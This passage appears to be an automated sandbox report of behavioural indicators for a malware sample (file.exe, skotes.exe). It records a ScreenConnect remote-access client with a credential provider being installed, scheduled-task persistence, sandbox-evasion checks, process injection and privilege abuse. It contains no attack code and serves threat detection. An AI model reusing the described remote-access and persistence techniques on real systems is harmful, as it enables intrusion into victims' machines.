File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.WindowsCredentialProvider.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\ScreenConnect.ClientService.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (9e47e837d725d609)\Client.en-US.resources	msiexec.exe

Drops file in Windows directory 15 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	file.exe
File created	C:\Windows\Installer\SourceHash{0F0F3A06-836F-1282-FBD2-C84A34E3C174}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2F58.tmp	msiexec.exe
File created	C:\Windows\Installer\{0F0F3A06-836F-1282-FBD2-C84A34E3C174}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2F88.tmp	msiexec.exe
File created	C:\Windows\Installer\wix{0F0F3A06-836F-1282-FBD2-C84A34E3C174}.SchedServiceConfig.rmi	MsiExec.exe
File created	C:\Windows\Installer\e582e02.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\{0F0F3A06-836F-1282-FBD2-C84A34E3C174}\DefaultIcon	msiexec.exe
File created	C:\Windows\Installer\e582e00.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e582e00.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3110.tmp	msiexec.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
3236	3168	WerFault.exe	95
5888	6300	WerFault.exe	217
244436	1288	Process not Found	226

System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	98fc6973d9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	53f031f69f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2b3f2f85be.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	7165bda865.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4ipQYBO.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bEp1dJF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ee69ff11d6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3QU4MGFSIPB37EB0HOOT5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7165bda865.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e4a30b7394.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a309bea949.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	file.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	194101cee1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	7165bda865.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZoomUpdateInstallerFull.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1988	powershell.exe
5244	PING.EXE
1844	powershell.exe
7128	PING.EXE
244692	Process not Found
6140	Process not Found

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a47b29fbd6f9c3720000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a47b29fb0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a47b29fb000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da47b29fb000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a47b29fb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe

Checks processor information in registry 2 TTPs 15 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ee69ff11d6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ee69ff11d6.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 5 IoCs

pid	Process
5124	taskkill.exe
5992	taskkill.exe
5520	taskkill.exe
5728	taskkill.exe
5140	taskkill.exe

Modifies data under HKEY_USERS 13 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe

Modifies registry class 38 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-9e47e837d725d609\shell	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-9e47e837d725d609\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\ProductIcon = "C:\\Windows\\Installer\\{0F0F3A06-836F-1282-FBD2-C84A34E3C174}\\DefaultIcon"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-9e47e837d725d609\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\60A3F0F0F6382821BF2D8CA4433E1C47	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\Version = "402849799"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-9e47e837d725d609\shell\open	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-BF96-5E4FD2C36D45}\ = "ScreenConnect Client (9e47e837d725d609) Credential Provider"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\ProductName = "ScreenConnect Client (9e47e837d725d609)"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\9e47e837d725d609\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\8A0D70CAC6F31D1AE9748E737D526D90\60A3F0F0F6382821BF2D8CA4433E1C47	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-BF96-5E4FD2C36D45}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (9e47e837d725d609)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-BF96-5E4FD2C36D45}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\8A0D70CAC6F31D1AE9748E737D526D90	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\SourceList\Media\1 = ";"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-9e47e837d725d609	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-9e47e837d725d609\URL Protocol	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-BF96-5E4FD2C36D45}	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-9e47e837d725d609\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (9e47e837d725d609)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-BF96-5E4FD2C36D45}\InprocServer32	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\PackageCode = "60A3F0F0F6382821BF2D8CA4433E1C47"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\SourceList\PackageName = "ScreenConnect.ClientSetup.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60A3F0F0F6382821BF2D8CA4433E1C47\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\9e47e837d725d609\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-9e47e837d725d609\UseOriginalUrlEncoding = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-9e47e837d725d609	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\60A3F0F0F6382821BF2D8CA4433E1C47\Full	msiexec.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
7128	PING.EXE
6140	Process not Found
5244	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
4648	schtasks.exe
5016	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5036	file.exe
5036	file.exe
2452	skotes.exe
2452	skotes.exe
4756	4ipQYBO.exe
4756	4ipQYBO.exe
4520	aspnet_regiis.exe
4520	aspnet_regiis.exe
4520	aspnet_regiis.exe
4520	aspnet_regiis.exe
4328	e4a30b7394.exe
4328	e4a30b7394.exe
4328	e4a30b7394.exe
4328	e4a30b7394.exe
4328	e4a30b7394.exe
4328	e4a30b7394.exe
2512	2b3f2f85be.exe
2512	2b3f2f85be.exe
2984	msiexec.exe
2984	msiexec.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5072	ScreenConnect.ClientService.exe
5740	ee69ff11d6.exe
5740	ee69ff11d6.exe
2512	2b3f2f85be.exe
2512	2b3f2f85be.exe
2512	2b3f2f85be.exe
2512	2b3f2f85be.exe
5740	ee69ff11d6.exe
5740	ee69ff11d6.exe
5740	ee69ff11d6.exe
5740	ee69ff11d6.exe
6044	chrome.exe
6044	chrome.exe
5776	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
5776	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
2032	7165bda865.exe
2032	7165bda865.exe
5776	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
5776	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
5776	CIDC67ZNJ4P6U2FURE3Q7ADLNJ.exe
6964	3QU4MGFSIPB37EB0HOOT5.exe
6964	3QU4MGFSIPB37EB0HOOT5.exe
2032	7165bda865.exe
2032	7165bda865.exe
6396	194101cee1.exe
6396	194101cee1.exe
6492	skotes.exe
6492	skotes.exe
1044	Intel_PTT_EK_Recertification.exe
1844	powershell.exe
1844	powershell.exe
1844	powershell.exe
6396	194101cee1.exe
6396	194101cee1.exe
6396	194101cee1.exe
5740	ee69ff11d6.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
5308	msedge.exe
5308	msedge.exe
5308	msedge.exe
5308	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1956	software1.exe
Token: SeDebugPrivilege	1796	ZoomUpdateInstallerFull.exe
Token: SeShutdownPrivilege	1460	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1460	msiexec.exe
Token: SeSecurityPrivilege	2984	msiexec.exe
Token: SeCreateTokenPrivilege	1460	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1460	msiexec.exe
Token: SeLockMemoryPrivilege	1460	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1460	msiexec.exe
Token: SeMachineAccountPrivilege	1460	msiexec.exe
Token: SeTcbPrivilege	1460	msiexec.exe
Token: SeSecurityPrivilege	1460	msiexec.exe
Token: SeTakeOwnershipPrivilege	1460	msiexec.exe
Token: SeLoadDriverPrivilege	1460	msiexec.exe
Token: SeSystemProfilePrivilege	1460	msiexec.exe
Token: SeSystemtimePrivilege	1460	msiexec.exe
Token: SeProfSingleProcessPrivilege	1460	msiexec.exe
Token: SeIncBasePriorityPrivilege	1460	msiexec.exe
Token: SeCreatePagefilePrivilege	1460	msiexec.exe
Token: SeCreatePermanentPrivilege	1460	msiexec.exe
Token: SeBackupPrivilege	1460	msiexec.exe
Token: SeRestorePrivilege	1460	msiexec.exe
Token: SeShutdownPrivilege	1460	msiexec.exe
Token: SeDebugPrivilege	1460	msiexec.exe
Token: SeAuditPrivilege	1460	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1460	msiexec.exe
Token: SeChangeNotifyPrivilege	1460	msiexec.exe
Token: SeRemoteShutdownPrivilege	1460	msiexec.exe
Token: SeUndockPrivilege	1460	msiexec.exe
Token: SeSyncAgentPrivilege	1460	msiexec.exe
Token: SeEnableDelegationPrivilege	1460	msiexec.exe
Token: SeManageVolumePrivilege	1460	msiexec.exe
Token: SeImpersonatePrivilege	1460	msiexec.exe
Token: SeCreateGlobalPrivilege	1460	msiexec.exe
Token: SeCreateTokenPrivilege	1460	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1460	msiexec.exe
Token: SeLockMemoryPrivilege	1460	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1460	msiexec.exe
Token: SeMachineAccountPrivilege	1460	msiexec.exe
Token: SeTcbPrivilege	1460	msiexec.exe
Token: SeSecurityPrivilege	1460	msiexec.exe
Token: SeTakeOwnershipPrivilege	1460	msiexec.exe
Token: SeLoadDriverPrivilege	1460	msiexec.exe
Token: SeSystemProfilePrivilege	1460	msiexec.exe
Token: SeSystemtimePrivilege	1460	msiexec.exe
Token: SeProfSingleProcessPrivilege	1460	msiexec.exe
Token: SeIncBasePriorityPrivilege	1460	msiexec.exe
Token: SeCreatePagefilePrivilege	1460	msiexec.exe
Token: SeCreatePermanentPrivilege	1460	msiexec.exe
Token: SeBackupPrivilege	1460	msiexec.exe
Token: SeRestorePrivilege	1460	msiexec.exe
Token: SeShutdownPrivilege	1460	msiexec.exe
Token: SeDebugPrivilege	1460	msiexec.exe
Token: SeAuditPrivilege	1460	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1460	msiexec.exe
Token: SeChangeNotifyPrivilege	1460	msiexec.exe
Token: SeRemoteShutdownPrivilege	1460	msiexec.exe
Token: SeUndockPrivilege	1460	msiexec.exe
Token: SeSyncAgentPrivilege	1460	msiexec.exe
Token: SeEnableDelegationPrivilege	1460	msiexec.exe
Token: SeManageVolumePrivilege	1460	msiexec.exe
Token: SeImpersonatePrivilege	1460	msiexec.exe
Token: SeCreateGlobalPrivilege	1460	msiexec.exe
Token: SeCreateTokenPrivilege	1460	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
5036	file.exe
1460	msiexec.exe
1460	msiexec.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
6044	chrome.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
5308	msedge.exe
5308	msedge.exe
5308	msedge.exe

Suspicious use of SendNotifyMessage 31 IoCs

pid	Process
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
5168	firefox.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe
2032	7165bda865.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5168	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5036 wrote to memory of 2452	5036	file.exe	83
PID 5036 wrote to memory of 2452	5036	file.exe	83
PID 5036 wrote to memory of 2452	5036	file.exe	83
PID 2452 wrote to memory of 4756	2452	skotes.exe	91
PID 2452 wrote to memory of 4756	2452	skotes.exe	91
PID 2452 wrote to memory of 4756	2452	skotes.exe	91
PID 2452 wrote to memory of 3168	2452	skotes.exe	95
PID 2452 wrote to memory of 3168	2452	skotes.exe	95
PID 2452 wrote to memory of 3168	2452	skotes.exe	95
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
PID 3168 wrote to memory of 4520	3168	bEp1dJF.exe	99
